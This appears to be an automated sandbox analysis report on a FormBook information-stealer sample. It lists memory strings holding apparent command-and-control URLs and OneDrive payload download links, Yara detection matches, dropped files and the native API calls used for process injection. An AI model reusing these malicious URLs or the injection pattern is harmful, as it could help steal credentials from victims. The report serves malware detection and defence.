Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.fekrforoush.com/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.fekrforoush.com/la8/www.lowbrowpizzaandbeer.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.fekrforoush.comReferer:
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.funuldigital.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.funuldigital.com/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.funuldigital.com/la8/www.3-333i000000x01-virus.net
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.funuldigital.comReferer:
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.hot-items-on-the-web.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.hot-items-on-the-web.com/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.hot-items-on-the-web.com/la8/www.talleralbamotors.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.hot-items-on-the-web.comReferer:
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.hothotshortie.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.hothotshortie.com/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.hothotshortie.com/la8/www.fekrforoush.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.hothotshortie.comReferer:
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp, mstsc.exe, 0000000B.00000002.2469457226.01BA9000.00000004.00000001.sdmp | String found in binary or memory: http://www.lowbrowpizzaandbeer.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp, mstsc.exe, 0000000B.00000002.2469457226.01BA9000.00000004.00000001.sdmp | String found in binary or memory: http://www.lowbrowpizzaandbeer.com/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.lowbrowpizzaandbeer.comReferer:
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.mansiobok3.info
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.mansiobok3.info/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.mansiobok3.info/la8/www.weifangruanjiankaifa.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.mansiobok3.infoReferer:
Source: mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.myaccesscomm.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.myaccesscomm.com/la8/
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.myaccesscomm.com/la8/www.pg-farm.com
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.myaccesscomm.comReferer:
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.onenationrescue.info
Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmp | String found in binary or memory: http://www.onenationrescue.info/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.onenationrescue.info/la8/www.bolbjergs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.onenationrescue.infoReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.pg-farm.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.pg-farm.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.pg-farm.com/la8/www.wangrunjs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.pg-farm.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.com/la8/www.mansiobok3.info
    Source: firefox.exe, 00000010.00000002.1594158119.008AF000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.com/statics/busy.html
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.shxzauto.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.talleralbamotors.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.talleralbamotors.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.talleralbamotors.com/la8/www.hothotshortie.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.talleralbamotors.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.wangrunjs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.wangrunjs.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.wangrunjs.com/la8/www.ciscoaslabs.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.wangrunjs.comReferer:
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.weifangruanjiankaifa.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.weifangruanjiankaifa.com/la8/
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.weifangruanjiankaifa.com/la8/www.hot-items-on-the-web.com
    Source: explorer.exe, 00000006.00000002.2472906388.02D00000.00000004.00000001.sdmpString found in binary or memory: http://www.weifangruanjiankaifa.comReferer:
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/Aj
    Source: Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/n
    Source: Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/t
    Source: Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737317069.00319000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mPTQhil0be4D-3ONzJ5ItuDGkvQHeM9XjnTIeZQgPsrIrD1WuxieuSeUoUkeeqzAP
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mWVMDxpWPQN7h2ntO62rmsxjBnMlUqJENO4jLBrAJqBNPJoM-eMXjoiXUXeL1Eia6
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mgfnu1PJWJr064ZL9YlIV3jl40tm0q28BBvNE2xZCPCi78baeQwIGk3HYt-PyWvAL
    Source: Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmpString found in binary or memory: https://6pjara.am.files.1drv.com/y4mwehRl38LwSse3IDMRjmotpTH5T3c42gDrwt-LN9unXWz0E3C09_0dxoZFaiJ7gTJ
    Source: mstsc.exe, 0000000B.00000003.1592164253.02680000.00000004.00000001.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.839971435.00293000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
    Source: Dynamitbom9.exe, 00000016.00000003.1688486304.0033C000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=B3B98222C3EF96E0&resid=B3B98222C3EF96E0%21184&authkey=AHHJ6Y6
    Source: Dynamitbom9.exe, 00000016.00000002.1737317069.00319000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/l
    Source: Dynamitbom9.exe, 00000009.00000002.839971435.00293000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/lT
    Source: Dynamitbom9.exe, 00000016.00000002.1737317069.00319000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/t
    Source: Dynamitbom9.exe, 00000004.00000002.814231250.007A5000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000016.00000002.1737442063.00364000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
    Source: Dynamitbom9.exe, 00000004.00000002.814167671.00759000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000009.00000002.841077985.0030D000.00000004.00000020.sdmp, mstsc.exe, 0000000B.00000003.1590897253.02600000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000016.00000002.1740725585.1DAD0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0

    E-Banking Fraud:

    Yara detected FormBook
    Source: Yara match | File source: 00000018.00000002.1740071374.00060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2473272217.030F0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000004.00000002.812505176.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000009.00000002.839828819.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000016.00000002.1736537733.00030000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000C.00000002.843123358.00180000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000004.00000002.813297733.006F0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000B.00000002.2467957823.01300000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000016.00000002.1740999047.1E280000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2473955848.03C20000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000010.00000002.1593989873.00060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000009.00000002.843680618.1DA20000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000B.00000002.2468014555.01330000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000B.00000002.2467062900.00180000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000000.763632814.0A000000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    Detected FormBook malware
    Source: C:\Windows\System32\mstsc.exe | Dropped file: C:\Users\user\AppData\Roaming\K56R799Q\K56logri.ini
    Source: C:\Windows\System32\mstsc.exe | Dropped file: C:\Users\user\AppData\Roaming\K56R799Q\K56logrv.ini
    Source: C:\Program Files\Mozilla Firefox\firefox.exe | Dropped file: C:\Users\user\AppData\Roaming\K56R799Q\K56logrf.ini
    Malicious sample detected (through community Yara rule)
    Source: 0000000B.00000002.2469359795.01A3D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000003.00000000.681534832.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000018.00000002.1740071374.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000018.00000002.1740071374.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000012.00000000.1625183151.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000002.00000000.672400170.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000002.00000002.690888732.0135D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000014.00000000.1664799274.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 0000000B.00000002.2467493164.002FA000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000006.00000002.2473272217.030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.2473272217.030F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000002.812505176.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000004.00000002.812505176.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000009.00000002.839828819.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000009.00000002.839828819.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000015.00000002.1700409548.0153D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000016.00000002.1736537733.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000016.00000002.1736537733.00030000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000011.00000002.1664860963.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000008.00000002.745327860.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 0000000C.00000002.843123358.00180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 0000000C.00000002.843123358.00180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000003.00000002.700791298.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000000.00000000.662300531.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000004.00000002.813297733.006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000004.00000002.813297733.006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.2467957823.01300000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.2467957823.01300000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000000.691985652.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000016.00000000.1680944385.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000000.00000002.681164345.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000016.00000002.1740999047.1E280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000016.00000002.1740999047.1E280000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000014.00000002.1704055361.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000009.00000000.730256748.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000006.00000002.2473955848.03C20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.2473955848.03C20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000010.00000002.1593989873.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000010.00000002.1593989873.00060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000013.00000000.1656172246.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000009.00000002.843680618.1DA20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000009.00000002.843680618.1DA20000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.2468014555.01330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.2468014555.01330000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.2467062900.00180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.2467062900.00180000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000012.00000002.1715495422.015CD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000008.00000000.722509027.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000013.00000002.1701159325.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000015.00000000.1671516866.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000010.00000002.1594135211.0044D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000011.00000000.1616534141.0040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
    Source: 00000006.00000000.763632814.0A000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000000.763632814.0A000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    Potential malicious icon found
    Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F7C0A NtResumeThread,0_2_001F7C0A
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F7829 NtProtectVirtualMemory,0_2_001F7829
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F44D9 NtAllocateVirtualMemory,0_2_001F44D9
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F0722 EnumWindows,NtSetInformationThread,TerminateProcess,NtAllocateVirtualMemory,0_2_001F0722
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F29F9 NtWriteVirtualMemory,0_2_001F29F9
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F7C17 NtResumeThread,0_2_001F7C17
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F2A09 NtWriteVirtualMemory,0_2_001F2A09
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F083D NtSetInformationThread,TerminateProcess,0_2_001F083D
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F2E9E NtWriteVirtualMemory,0_2_001F2E9E
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F7E9B NtResumeThread,0_2_001F7E9B
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F2CBD NtWriteVirtualMemory,0_2_001F2CBD
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F80A5 NtResumeThread,0_2_001F80A5
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F2AD9 NtWriteVirtualMemory,0_2_001F2AD9
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F82D5 NtResumeThread,0_2_001F82D5
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F7CC3 NtResumeThread,0_2_001F7CC3
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F3AE2 NtAllocateVirtualMemory,0_2_001F3AE2
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F7F37 NtResumeThread,0_2_001F7F37
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F076D NtSetInformationThread,TerminateProcess,0_2_001F076D
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F2D9E NtWriteVirtualMemory,0_2_001F2D9E
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F2FD1 NtWriteVirtualMemory,0_2_001F2FD1
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F2BC5 NtWriteVirtualMemory,0_2_001F2BC5
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F7DFF NtResumeThread,0_2_001F7DFF
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F81E5 NtResumeThread,0_2_001F81E5
    Source: C:\Users\user\Desktop\sample.exe | Code function: 0_2_001F7FE1 NtResumeThread,0_2_001F7FE1
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_00157829 NtProtectVirtualMemory,2_2_00157829
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_001544D9 NtAllocateVirtualMemory,2_2_001544D9
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_00150722 EnumWindows,NtSetInformationThread,NtProtectVirtualMemory,TerminateProcess,NtAllocateVirtualMemory,2_2_00150722
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_0015083D NtSetInformationThread,TerminateProcess,2_2_0015083D
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_00150ADD NtProtectVirtualMemory,2_2_00150ADD
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_00153AE2 NtAllocateVirtualMemory,2_2_00153AE2
    Source: C:\Users\user\Desktop\sample.exe | Code function: 2_2_0015076D NtSetInformationThread,TerminateProcess,2_2_0015076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F7C0A NtResumeThread,3_2_001F7C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F7829 NtProtectVirtualMemory,3_2_001F7829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F44D9 NtAllocateVirtualMemory,3_2_001F44D9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F0722 EnumWindows,NtSetInformationThread,TerminateProcess,NtAllocateVirtualMemory,3_2_001F0722
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F29F9 NtWriteVirtualMemory,3_2_001F29F9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F7C17 NtResumeThread,3_2_001F7C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F2A09 NtWriteVirtualMemory,3_2_001F2A09
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F083D NtSetInformationThread,TerminateProcess,3_2_001F083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F2E9E NtWriteVirtualMemory,3_2_001F2E9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F7E9B NtResumeThread,3_2_001F7E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F2CBD NtWriteVirtualMemory,3_2_001F2CBD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F80A5 NtResumeThread,3_2_001F80A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F2AD9 NtWriteVirtualMemory,3_2_001F2AD9
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F82D5 NtResumeThread,3_2_001F82D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F7CC3 NtResumeThread,3_2_001F7CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F3AE2 NtAllocateVirtualMemory,3_2_001F3AE2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F7F37 NtResumeThread,3_2_001F7F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F076D NtSetInformationThread,TerminateProcess,3_2_001F076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F2D9E NtWriteVirtualMemory,3_2_001F2D9E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F2FD1 NtWriteVirtualMemory,3_2_001F2FD1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F2BC5 NtWriteVirtualMemory,3_2_001F2BC5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F7DFF NtResumeThread,3_2_001F7DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exe | Code function: 3_2_001F81E5 NtResumeThread,3_2_001F81E5
